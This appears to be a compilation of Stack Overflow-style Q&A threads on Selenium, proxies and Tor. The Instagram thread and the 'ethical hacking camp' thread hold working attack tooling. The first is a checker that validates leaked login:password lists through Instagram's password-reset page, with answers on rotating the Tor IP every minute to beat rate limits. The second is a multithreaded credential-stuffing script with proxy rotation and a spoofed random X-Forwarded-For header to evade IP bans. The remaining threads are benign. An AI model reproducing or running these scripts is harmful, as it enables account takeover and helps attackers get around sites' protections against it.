I am writing a checker for Instagram accounts.
Please tell me how to change the IP address when the browser restarts. I am using a Tor profile, so the IP changes automatically every 10 minutes. How can I make the IP change once per minute instead? Is that even possible?
Maybe there is some set_preference option, or some other way to change the IP when restarting Firefox with the Tor settings.
import time

from selenium import webdriver
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile

file = open('Good2.txt', encoding='utf-8-sig').read().split('\n')
goods = open('good_acc.txt', 'a+')

def settings_browser():
    """Firefox browser settings."""
    profile = FirefoxProfile(r'C:\Users\ASUS\Desktop\Scrape\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default')
    profile.set_preference('network.proxy.type', 1)
    profile.set_preference('network.proxy.socks', '127.0.0.1')
    # 9050 is the standalone tor daemon; Tor Browser's bundled tor listens on 9150
    profile.set_preference('network.proxy.socks_port', 9050)
    # True routes DNS lookups through Tor as well, avoiding DNS leaks
    profile.set_preference("network.proxy.socks_remote_dns", True)
    # get a huge speed increase by not downloading images
    profile.set_preference("permissions.default.image", 2)
    profile.update_preferences()
    return profile
def check_email():
    """Accepts the cookie pop-up, then checks each address for validity;
    valid accounts are saved to 'good_acc.txt'."""
    driver = webdriver.Firefox(firefox_profile=settings_browser(), executable_path=r'C:\Users\ASUS\Desktop\Scrape\geckodriver.exe')
    for login in file:
        driver.get("https://www.instagram.com/accounts/password/reset/")
        body = driver.find_elements_by_class_name('pbNvD.FrS-d.gD9tr')
        for bd in body:
            # 'Принять все' is the Russian-locale "Accept all" cookie button
            if bd.find_element_by_class_name('aOOlW.bIiDR').text == 'Принять все':
                bd.find_element_by_class_name('aOOlW.bIiDR').click()
        time.sleep(7)
        authorization = driver.find_elements_by_class_name("AHCwU")
        pops = driver.find_elements_by_class_name("_-rjm")
        username = login.split(":")[0]
        password = login.split(":")[1]
        for data in authorization:
            # e-mail / username field
            data_login = data.find_element_by_name('cppEmailOrUsername')
            data_login.click()
            data_login.send_keys(username)
            time.sleep(1)
            # submit button
            clock_button = data.find_element_by_class_name('sqdOP.L3NKy.y3zKF')
            clock_button.click()
        time.sleep(2)
        for pop in pops:
            # the strings matched below are the Russian-locale page texts
            if 'Мы отправили ссылку для восстановления' in pop.find_element_by_class_name('tA2fc').text:
                # address is registered
                goods.write(username + ' : ' + password + '\n')
                print('Valid account ' + username + ' : ' + password)
            elif 'Подождите несколько минут, прежде чем пытаться снова.' in pop.find_element_by_class_name('tA2fc').text:
                driver.quit()
                driver = webdriver.Firefox(firefox_profile=settings_browser(), executable_path=r'C:\Users\ASUS\Desktop\Scrape\geckodriver.exe')
                print('Driver restarted after "Wait a few minutes before trying again."')
            elif 'feedback_required' in pop.find_element_by_class_name('tA2fc').text:
                driver.quit()
                driver = webdriver.Firefox(firefox_profile=settings_browser(), executable_path=r'C:\Users\ASUS\Desktop\Scrape\geckodriver.exe')
                print('Driver restarted after "feedback_required"')
            else:
                # address is not registered
                print('Invalid account ' + username)
    goods.close()

def main():
    check_email()

if __name__ == '__main__':
    main()
If you set ControlPort 9051 (and a hashed password) in Tor's config file (/etc/tor/torrc on Linux), then you can use even a standard socket to send tor the signal to change its IP.
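For reference, a minimal torrc sketch (the hash is a placeholder; generate your own with tor --hash-password). MaxCircuitDirtiness is optional: lowering it to 60 makes Tor rotate circuits about once per minute on its own, which is what the question asks for:

# /etc/tor/torrc
ControlPort 9051
# generate the value with: tor --hash-password your_password
HashedControlPassword 16:YOUR_HASH_HERE
# optional: build a fresh circuit every ~60 seconds instead of the 10-minute default
MaxCircuitDirtiness 60

With that in place, even a plain socket is enough to ask tor for a new identity: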
import socket

s = socket.socket()
s.connect(('127.0.0.1', 9051))
s.send('AUTHENTICATE "your_password"\r\nSIGNAL NEWNYM\r\n'.encode())
It takes a few seconds for tor to build a new circuit; after that the proxy should be using the new IP.
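A quick way to confirm that the exit IP actually changed (a sketch; it assumes the requests package installed with SOCKS support, i.e. pip install requests[socks]):

import requests

# socks5h:// makes the proxy resolve DNS as well, which is what you want with Tor
proxies = {'http': 'socks5h://127.0.0.1:9050', 'https': 'socks5h://127.0.0.1:9050'}
print(requests.get('https://api.ipify.org', proxies=proxies).text)  # prints the address the server sees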
You can also use the stem module for this (it needs the same torrc settings):
from stem import Signal
from stem.control import Controller

with Controller.from_port(port=9051) as controller:
    controller.authenticate(password='your_password')
    controller.signal(Signal.NEWNYM)
More: Python: How to use Tor Network with requests to change IP?
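To change the IP roughly once per minute, as the question asks, you can send the signal on a timer. A sketch using stem (note that tor rate-limits NEWNYM; get_newnym_wait() reports how long to hold off, so the loop respects whichever wait is longer):

import time
from stem import Signal
from stem.control import Controller

def renew_ip_forever(interval=60):
    with Controller.from_port(port=9051) as controller:
        controller.authenticate(password='your_password')
        while True:
            controller.signal(Signal.NEWNYM)
            # sleep at least `interval`, longer if tor is still rate-limiting NEWNYM
            time.sleep(max(interval, controller.get_newnym_wait()))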
EDIT:

import socket
import time

def main():
    # send signal to `tor` to change IP
    s = socket.socket()
    s.connect(('127.0.0.1', 9051))
    s.send('AUTHENTICATE "your_password"\r\nSIGNAL NEWNYM\r\n'.encode())
    # wait a few seconds to get the new IP
    time.sleep(3)
    check_email()
Related
I'm using multiprocessing to test proxy servers for usability. The target function of each process takes a proxy server address and a queue as arguments and opens a webdriver instance with the given proxy. The function tests the proxy by going to a specific URL and trying to retrieve an HTML element. If the test succeeds, the function adds the webdriver instance to the queue. The function is shown below.
def test_proxy(address, queue):
    print(f"testing proxy {address}")
    chrome_options_1 = webdriver.ChromeOptions()
    chrome_options_1.add_argument('--proxy-server=%s' % address)
    chrome_options_1.add_argument("headless")
    driver = webdriver.Chrome(r'.\driver\chromedriver.exe', options=chrome_options_1)
    driver.set_page_load_timeout(10)
    url = "https://www.facebook.com/marketplace/nyc/search/?query=honda"
    try:
        driver.get(url)
        driver.find_element_by_xpath("//*[@class='kbiprv82']/a").get_attribute("href")
        print(f"Successfully connected to proxy server at {address}")
        queue.put(driver)
        return
    except:
        print("Connection failed")
        driver.quit()
In my main process I have a list of proxy addresses to test. A process is created to test each proxy in the list until a test succeeds and a driver instance is put in the queue. Once an item is found in the queue, all the processes are terminated and the proxy list is cleared. The loop in my main process limits the number of child processes to 10. The main-process code is in a class and is shown below.
def find_proxy(self):
    self.proxies = []
    self.proxy_queue = multiprocessing.Queue()
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_argument("headless")
    driver = webdriver.Chrome(r'.\driver\chromedriver.exe', options=chrome_options)
    driver.get("https://free-proxy-list.net/")
    Select(driver.find_element_by_xpath("//*[@id='proxylisttable']/tfoot/tr/th[7]/select")).select_by_visible_text("yes")
    for country in ["US", "MX", "CA", "CL", "CO", "BR", "PE"]:
        try:
            Select(driver.find_element_by_xpath("//*[@id='proxylisttable']/tfoot/tr/th[3]/select")).select_by_visible_text(country)
            i = 0
            entries = driver.find_elements_by_xpath("//table[@id='proxylisttable']/tbody/tr/td")
            for entry in entries:
                if i == 7:
                    i = 0
                    self.proxies.append([proxy_address])
                else:
                    if i == 0:
                        proxy_address = entry.text + ':'
                    if i == 1:
                        proxy_address = proxy_address + entry.text
                    i = i + 1
        except:
            pass
    driver.quit()
    while len(self.proxies) > 0:
        i = 0
        for proxy in self.proxies[:10]:
            if self.proxy_queue.empty() == False:
                driver = self.proxy_queue.get()
                for proxy_1 in self.proxies:
                    try:
                        proxy_1[1].terminate()
                    except:
                        pass
                self.proxies.clear()
                return driver
            elif len(proxy) < 2:
                proxy.insert(1, multiprocessing.Process(target=test_proxy, args=(proxy[0], self.proxy_queue,)))
                print(f"proxy thread {proxy[0]} created")
                proxy[1].start()
                print(f"proxy thread {proxy[0]} started")
            elif proxy[1].is_alive() == False:
                print(f"proxy thread {proxy[0]} dead")
                del self.proxies[i]
                print("proxy deleted")
                break
            i = i + 1
The issue is that the processes seem to start just fine, but none of the code in the test_proxy function actually runs, not even the first print statement.
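One thing worth checking (an assumption on my part, based on the chromedriver.exe path suggesting Windows): on Windows, multiprocessing spawns a fresh interpreter per process, so process creation must sit behind an if __name__ == '__main__': guard, and everything put on a multiprocessing.Queue gets pickled, while a WebDriver instance generally is not picklable, which can make the queue's feeder thread fail quietly. A minimal sketch of the pattern, passing back the picklable proxy address instead of the driver:

import multiprocessing

def test_proxy(address, queue):
    # ... run the selenium checks here ...
    queue.put(address)  # put the picklable address, not the WebDriver itself

if __name__ == '__main__':  # required on Windows (spawn start method)
    queue = multiprocessing.Queue()
    p = multiprocessing.Process(target=test_proxy, args=("1.2.3.4:8080", queue))
    p.start()
    print(queue.get())  # the address of a working proxy; build the driver here
    p.join()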
I'm writing a script to access a website through proxies with multiple threads, but I'm stuck on the threading part: when I run the script below, it opens 5 browsers but all 5 use the same proxy. I want the 5 browsers to use different proxies. Can someone help me complete it? Thank you.
Here is my script:
from selenium import webdriver
import time, random
import threading

def e():
    a = open("sock2.txt", "r")
    for line in a.readlines():
        b = line
        prox = b.split(":")
        IP = prox[0]
        PORT = int(prox[1].strip("\n"))
        print(IP)
        print(PORT)
        profile = webdriver.FirefoxProfile()
        profile.set_preference("network.proxy.type", 1)
        profile.set_preference("network.proxy.socks", IP)
        profile.set_preference("network.proxy.socks_port", PORT)
        try:
            driver = webdriver.Firefox(firefox_profile=profile)
            driver.get("http://www.whatsmyip.org/")
        except:
            print("Proxy Connection Error")
            driver.quit()
        else:
            time.sleep(random.randint(40, 70))
            driver.quit()

for i in range(5):
    t = threading.Thread(target=e)
    t.start()
(Wishing everyone a happy and lucky New Year!)
Dominik Lašo captured it correctly: each thread processes the file from the beginning. Here's roughly how it should look:
from selenium import webdriver
import time, random
import threading

def e(ip, port):
    profile = webdriver.FirefoxProfile()
    profile.set_preference("network.proxy.type", 1)
    profile.set_preference("network.proxy.socks", ip)
    profile.set_preference("network.proxy.socks_port", port)
    try:
        driver = webdriver.Firefox(firefox_profile=profile)
        driver.get("http://www.whatsmyip.org/")
    except:
        print("Proxy Connection Error")
        driver.quit()
    else:
        time.sleep(random.randint(40, 70))
        driver.quit()

my_threads = []
with open("sock2.txt", "r") as fd:
    for line in fd.readlines():
        line = line.strip()
        if not line:
            continue
        prox = line.split(":")
        ip = prox[0]
        port = int(prox[1])
        print('-> {}:{}'.format(ip, port))
        t = threading.Thread(target=e, args=(ip, port,))
        t.start()
        my_threads.append(t)

for t in my_threads:
    t.join()
(I personally think the problem is that every thread you start goes through the text file from the beginning, because you aren't removing the lines you've already used.)
I have come across the same problem when I was doing the same thing you are doing now. I know you would rather have help with your own code, but I'm in a hurry to test it and want to help you ;), so here is code that works for me... There is even a task killer for Chrome (you just have to adapt it to Firefox).
If I were you, I would start each thread after reading a line from the file, because it looks like you are reading the same file from the first line every time a thread starts:
import os
import time
import threading
from selenium import webdriver

links = []  # links you want to go to

def funk(xxx, website):
    link = website
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_argument('--proxy-server=%s' % str(xxx))
    chromedriver = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'chromedriver')
    chrome = webdriver.Chrome(chromedriver, chrome_options=chrome_options)
    try:
        pass  # do stuff
    except:
        print('exception')
        chrome.close()

number_of_used_proxies = 0
for link in links:
    f = open('proxies.txt')
    line = f.readline()
    x = 1
    while line:
        if number_of_used_proxies < 10:
            print(line)
            line = f.readline()
            try:
                threading.Timer(40, funk, [line, link]).start()
            except Exception as e:
                print(e)
            time.sleep(1)
            x += 1
            number_of_used_proxies += 1
        else:
            time.sleep(100)
            for x in range(1, 10):
                try:
                    # on Windows: os.system("taskkill /f /im chrome.exe")
                    os.system("killall 'Google Chrome'")
                except:
                    print("NoMore")
            time.sleep(10)
            number_of_used_proxies = 0
    f.close()
Hope it helps :)
@vantuong: Here's how you can solve the problem with ThreadPoolExecutor.
Reference: https://docs.python.org/3/library/concurrent.futures.html
from selenium import webdriver
import time, random
#import threading
import concurrent.futures

MAX_WORKERS = 5

def get_proxys(data_file):
    proxys = []
    with open(data_file, "r") as fd:
        for line in fd.readlines():
            line = line.strip()
            if not line:
                continue
            prox = line.split(":")
            ip = prox[0]
            port = int(prox[1])
            proxys.append((ip, port))
    return proxys

def e(ip, port):
    profile = webdriver.FirefoxProfile()
    profile.set_preference("network.proxy.type", 1)
    profile.set_preference("network.proxy.socks", ip)
    profile.set_preference("network.proxy.socks_port", port)
    try:
        driver = webdriver.Firefox(firefox_profile=profile)
        driver.get("http://www.whatsmyip.org/")
    except:
        print("Proxy Connection Error")
        driver.quit()
    else:
        time.sleep(random.randint(40, 70))
        driver.quit()

with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
    proxys = get_proxys('sock2.txt')
    tasks = {executor.submit(e, proxy[0], proxy[1]): proxy for proxy in proxys}
    for task in concurrent.futures.as_completed(tasks):
        proxy = tasks[task]
        try:
            data = task.result()
        except Exception as exc:
            print('{} generated an exception: {}'.format(proxy, exc))
        else:
            print('{} completed successfully'.format(proxy))
Fun exercise: Try playing around with different values of MAX_WORKERS.
As part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests to a website using proxies. To do that, I've come up with the following code:
import requests
from Queue import Queue
from threading import Thread
import time
from math import ceil  # needed for the summary at the end
from lxml import html
import json
from time import sleep

global proxy_queue
global user_queue
global hits
global stats
global start_time

def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/'
    }

def make_requests():
    global user_queue
    while True:
        uname_pass = user_queue.get().split(':')
        status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
        if status == 1:
            hits.put(uname_pass)
            stats['hits'] += 1
        if status == 0:
            stats['fake'] += 1
        if status == -1:
            user_queue.put(':'.join(uname_pass))
            stats['IP Banned'] += 1
        if status == -2:
            stats['Exception'] += 1
        user_queue.task_done()

def get_status(uname, password):
    global proxy_queue
    try:
        if proxy_queue.empty():
            print 'Reloaded proxies, sleeping for 2 mins'
            sleep(120)
        session = requests.session()
        proxy = 'http://' + proxy_queue.get()
        login_url = 'http://example.com/login'
        header = get_default_header()
        header['X-Forwarded-For'] = '8.8.8.8'
        login_page = session.get(
            login_url,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        tree = html.fromstring(login_page.text)
        csrf = list(set(tree.xpath("//input[@name='csrfmiddlewaretoken']/@value")))[0]
        payload = {
            'email': uname,
            'password': password,
            'csrfmiddlewaretoken': csrf,
        }
        result = session.post(
            login_url,
            data=payload,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        if result.status_code == 200:
            if 'access_token' in session.cookies:
                return 1
            elif 'Please check your email and password.' in result.text:
                return 0
            else:
                # IP banned
                return -1
        else:
            # IP banned
            return -1
    except Exception as e:
        print e
        return -2

def populate_proxies():
    global proxy_queue
    proxy_queue = Queue()
    with open('nice_proxy.txt', 'r') as f:
        for line in f.readlines():
            proxy_queue.put(line.replace('\n', ''))

def hit_printer():
    while True:
        sleep(5)
        print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake']) / ((time.time() - start_time) / 60)),

if __name__ == '__main__':
    global user_queue
    global proxy_queue
    global stats
    global start_time
    stats = dict()
    stats['hits'] = 0
    stats['fake'] = 0
    stats['IP Banned'] = 0
    stats['Exception'] = 0
    threads = 200
    hits = Queue()
    uname_password_file = '287_uname_pass.txt'
    populate_proxies()
    user_queue = Queue(threads)
    for i in range(threads):
        t = Thread(target=make_requests)
        t.daemon = True
        t.start()
    printer = Thread(target=hit_printer)  # renamed so it doesn't shadow the function
    printer.daemon = True
    printer.start()
    start_time = time.time()
    try:
        count = 0
        with open(uname_password_file, 'r') as f:
            for line in f.readlines():
                count += 1
                if count > 2000:
                    break
                user_queue.put(line.replace('\n', ''))
        user_queue.join()
        print '####################Result#####################'
        while not hits.empty():
            print hits.get()
        ttr = round(time.time() - start_time, 3)
        print 'Time required: ' + str(ttr)
        print 'average combos/min: ' + str(ceil(2000 / (ttr / 60)))
    except Exception as e:
        print e
So it is expected to make many requests to the website through multiple threads, but it doesn't work as expected: after a few requests, the proxies get banned and it stops working. Since I dispose of each proxy after using it, that shouldn't happen. So I believe it might be due to one of the following:
In an attempt to make multiple requests using multiple sessions, it's somehow failing to keep the sessions separate.
The victim site bans IPs by group, e.g. banning all IPs starting with 132.x.x.x after receiving multiple requests from any of the 132.x.x.x IPs.
The victim site is using headers like 'X-Forwarded-For', 'Client-IP', 'Via', or a similar header to detect the originating IP. But that seems unlikely, because I can log in via my browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I'm unsure whether I'm making an error in the threading part or the requests part; any help is appreciated.
I have figured out what the problem was, thanks to @Martijn Pieters; as usual, he's a lifesaver.
I was using elite-level proxies, and there was no way the victim site could have found my IP address; however, it was using X-Forwarded-For to detect my real IP address.
Since elite-level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was via the latest address in X-Forwarded-For. The solution is to set the X-Forwarded-For header to a random IP address every time a request is made, which successfully spoofs the victim site into believing the request is legit:
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
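For context, here is a sketch of how that line can slot into the code from the question (get_default_header() is the helper defined there; note that random must be imported):

import random

def get_spoofed_header():
    header = get_default_header()
    # a fresh random IP per request, so X-Forwarded-For never carries the real address
    header['X-Forwarded-For'] = '.'.join([str(random.randint(0, 255)) for i in range(4)])
    return header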
I have a Python script that monitors USB ports (it checks which devices are connected). The script performs some scraping and displays a desktop notification. I would like it to run automatically on every boot. This is the code:
#!/usr/bin/python
import glib
import re
import subprocess
import requests
import bs4
import datetime
import sys
import os
import time
from selenium import webdriver
from pyudev import Context, Monitor
from selenium.common.exceptions import NoSuchElementException

def demote():
    def result():
        os.setgid(100)
        os.setuid(1000)
    return result

def inotify(title, message):
    subprocess.call(['notify-send', '{}\n'.format(title), '{0}\n'.format(message)], preexec_fn=demote())
    #os.system('notify-send ' + title + ' ' + message)

def get_network_data(tout):
    """Scrapes balance data from ISP website."""
    if tout is not None:
        try:
            # Do some scraping
            if data_found:
                full_msg = '{0}\n{1}'.format(my_balance.capitalize(), airtime_balance.capitalize())
                inotify('My Balance', full_msg)
                #subprocess.call(['notify-send', 'My Balance', '\n{0}\n{1}'.format(my_balance.capitalize(), airtime_balance.capitalize())], preexec_fn=demote())
            else:
                print('Could not retrieve data from page...')
                full_msg = '{0}'.format('Error: Could not retrieve data from page.')
                inotify('My Balance', full_msg)
                #subprocess.call(['notify-send', 'My Balance', '\n{0}'.format('Error: Could not retrieve data from page.')], preexec_fn=demote())
        except NoSuchElementException:
            print('Could not locate element...')
            full_msg = '{0}'.format('Error: Could not locate element - acc.')
            inotify('My Balance', full_msg)
            #subprocess.call(['notify-send', 'iMonitor:get_network_data', '\n{0}'.format('Error: Could not locate element - acc.')], preexec_fn=demote())
    else:
        print('Could not find USB device...')
        full_msg = '\n{0}'.format('Error: Could not find USB device.')
        inotify('My Balance', full_msg)
        #subprocess.call(['notify-send', 'iMonitor', '\n{0}'.format('Error: Could not find USB device.')], preexec_fn=demote())

def identify_phone(observer, device):
    """Identifies if a specific USB device (phone) is connected (tethered)."""
    global last_updated, initial_search, msg_count
    current_time = datetime.datetime.now()
    time_diff = current_time - last_updated
    if (time_diff.seconds > 300) or initial_search:
        try:
            time.sleep(0.25)
            tout = subprocess.check_output("lsusb | grep 1234:5678", shell=True)
        except subprocess.CalledProcessError:
            tout = None
        last_updated = datetime.datetime.now()
        initial_search = False
        get_network_data(tout)
    if time_diff.seconds > 10:
        msg_count = 1
    if not initial_search and msg_count == 1:
        wait_time = datetime.datetime.fromtimestamp(600 - time_diff.seconds)
        message = wait_time.strftime('You may have to wait %-M minute(s), %-S second(s) before another check is done.')
        print('Could not retrieve data from page...')
        full_msg = '\n{0}'.format(message)
        inotify('My Balance', full_msg)
        #subprocess.call(['notify-send', 'iMonitor:Identify Phone', '\n{0}'.format(message)], preexec_fn=demote())
        msg_count += 1

try:
    initial_search = True
    last_updated = datetime.datetime.now()
    msg_count = 1
    try:
        from pyudev.glib import MonitorObserver
    except ImportError:
        from pyudev.glib import GUDevMonitorObserver as MonitorObserver
    context = Context()
    monitor = Monitor.from_netlink(context)
    monitor.filter_by(subsystem='usb')
    observer = MonitorObserver(monitor)
    observer.connect('device-added', identify_phone)
    monitor.start()
    glib.MainLoop().run()
except KeyboardInterrupt:
    print('\nShutdown requested.\nExiting gracefully...')
    sys.exit(0)
However, the script runs as root, and although I have tried to change the UID and GID, I have not managed to get it to display desktop notifications to the logged-in (normal) user. Any help would be appreciated.
PS:
OS: openSUSE 42.1
KDE version: KDE Plasma 5.5.5
I assume you need the script to run in KDE, in which case you can simply copy or link the script into the ~/.kde/Autostart/ directory in KDE 4. In KDE 5 the directory has moved to ~/.config/autostart.
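In Plasma 5 you can also use a .desktop entry there; a minimal sketch (the file name and paths are placeholders for your setup):

# ~/.config/autostart/usb-monitor.desktop
[Desktop Entry]
Type=Application
Name=USB Monitor
Exec=/usr/bin/python /home/youruser/bin/usb_monitor.py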
You can also use a cron job with the @reboot modifier; it will run every time your system boots.
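A sketch of the crontab entry (edit with crontab -e as the desktop user; the script path is a placeholder). Cron jobs start without a desktop environment, so notify-send may also need DISPLAY (and possibly DBUS_SESSION_BUS_ADDRESS) set:

@reboot DISPLAY=:0 /usr/bin/python /home/youruser/bin/usb_monitor.py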
I'm using libmproxy to capture HTTP traffic. I would like to use webdriver to load a web page while the proxy is running. The proxy code works great, but I am unable to launch the page. I assume the script is getting stuck in a loop at m.run(). How can I reach the webdriver code while the proxy is running?
import unittest
import sys
from libmproxy import proxy, dump, cmdline
from libmproxy.version import VERSION
from optparse import OptionParser
from selenium import webdriver

class Test(unittest.TestCase):

    def setUp(self):
        parser = OptionParser(
            usage="%prog [options] [filter]",
            version="%%prog %s" % VERSION,
        )
        cmdline.common_options(parser)
        parser.add_option(
            "--keepserving",
            action="store_true", dest="keepserving", default=False,
            help="Continue serving after client playback or file read. We exit by default."
        )
        options, args = parser.parse_args()
        if options.quiet:
            options.verbose = 0
        proxyconfig = proxy.process_proxy_options(parser, options)
        if options.no_server:
            server = proxy.DummyServer(proxyconfig)
        else:
            try:
                server = proxy.ProxyServer(proxyconfig, options.port, options.addr)
            except proxy.ProxyServerError, v:
                print >> sys.stderr, "mitmdump:", v.args[0]
                sys.exit(1)
        try:
            dumpopts = dump.Options(**cmdline.get_common_options(options))
        except cmdline.OptionException, v:
            parser.error(v.message)
        dumpopts.keepserving = options.keepserving
        if args:
            filt = " ".join(args)
        else:
            filt = None
        try:
            PROXY_HOST = "localhost"
            PROXY_PORT = 8080
            #driver.get("http://msn.com")
            #f = open('/Users/cnave/Documents/capture/dump.txt', 'w')
            #sys.stdout('/Users/cnave/Documents/capture/dump.txt', 'w')
            #open('/Users/cnave/Documents/capture/dump.txt', 'w')
            m = dump.DumpMaster(server, dumpopts, filt)
            m.run()  # blocks here, so the webdriver code below is never reached
            #sys.stdout('/Users/cnave/Documents/capture/dump')
            fp = webdriver.FirefoxProfile()
            # Direct = 0, Manual = 1, PAC = 2, AUTODETECT = 4, SYSTEM = 5
            fp.set_preference("network.proxy.type", 1)
            fp.set_preference("network.proxy.http", PROXY_HOST)
            fp.set_preference("network.proxy.http_port", PROXY_PORT)
            fp.set_preference("network.proxy.no_proxies_on", "")  # set this value as desired
            driver = webdriver.Firefox(firefox_profile=fp)
            driver.get('http://google.com')
        except dump.DumpError, e:
            print >> sys.stderr, "mitmdump:", e
            sys.exit(1)
        except KeyboardInterrupt:
            pass
import thread  # Python 2 module; use threading in Python 3

self.dm = dump.DumpMaster(server, dumpopts, filt)
# run the MITM proxy in a background thread instead of blocking on run()
thread.start_new_thread(self.dm.run, ())

# and you may need to shut down the proxy in tearDown():
self.dm.shutdown()
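Putting it together, a sketch of how the test class could be organized (this targets the old Python 2 libmproxy API used above; port 8080 matches PROXY_PORT, and the option parsing stays as in the question):

import thread

class Test(unittest.TestCase):

    def setUp(self):
        # ... build `server`, `dumpopts` and `filt` exactly as above ...
        self.dm = dump.DumpMaster(server, dumpopts, filt)
        thread.start_new_thread(self.dm.run, ())  # proxy now serves in the background

    def test_capture(self):
        fp = webdriver.FirefoxProfile()
        fp.set_preference("network.proxy.type", 1)  # manual proxy settings
        fp.set_preference("network.proxy.http", "localhost")
        fp.set_preference("network.proxy.http_port", 8080)
        fp.set_preference("network.proxy.no_proxies_on", "")
        self.driver = webdriver.Firefox(firefox_profile=fp)
        self.driver.get('http://google.com')

    def tearDown(self):
        self.driver.quit()
        self.dm.shutdown()  # stop the background proxy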